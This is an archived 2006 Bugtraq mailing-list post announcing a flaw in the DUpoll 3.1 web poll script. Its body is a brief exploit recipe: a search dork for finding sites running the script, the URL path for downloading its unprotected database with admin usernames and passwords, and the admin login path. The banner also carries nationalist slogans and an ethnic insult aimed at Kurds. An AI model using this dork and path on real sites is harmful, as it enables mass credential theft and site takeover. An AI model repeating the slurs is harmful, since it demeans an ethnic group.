lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060829160348.5006.qmail@securityfocus.com> Date: 29 Aug 2006 16:03:48 -0000 From: bozkurtserdar@...kurtserdar.com To: bugtraq@...urityfocus.com Subject: DUpoll 3.1 security alert ############################################################################# #DUpoll 3.1 application bug # # # #BoZKuRTSeRDaR Ülkücü Milliyetçi Türkçü İnternet korsanı # # # #kahrolsun pkk kahrolsun Komünizm fuck kurdish lamerz # # # #Discovered by: BoZKuRTSeRDaR bozkurtserdar[at]bozkurtserdar[dot]com # # # # # ############################################################################# Vendor URL : DUpoll http://www.duware.com/demos/DUpoll/ Dork/Search for: "Powered by DUpoll" Exploit : http://www.target.com/[DUpollpatch]/_private/Dupoll.mdb database downloading database users table administratory users and pasword go dir http://www.target.com/[DUpollpatch]/admin/default.asp Security Adivisory | Edithor by BoZKuRTSeRDaR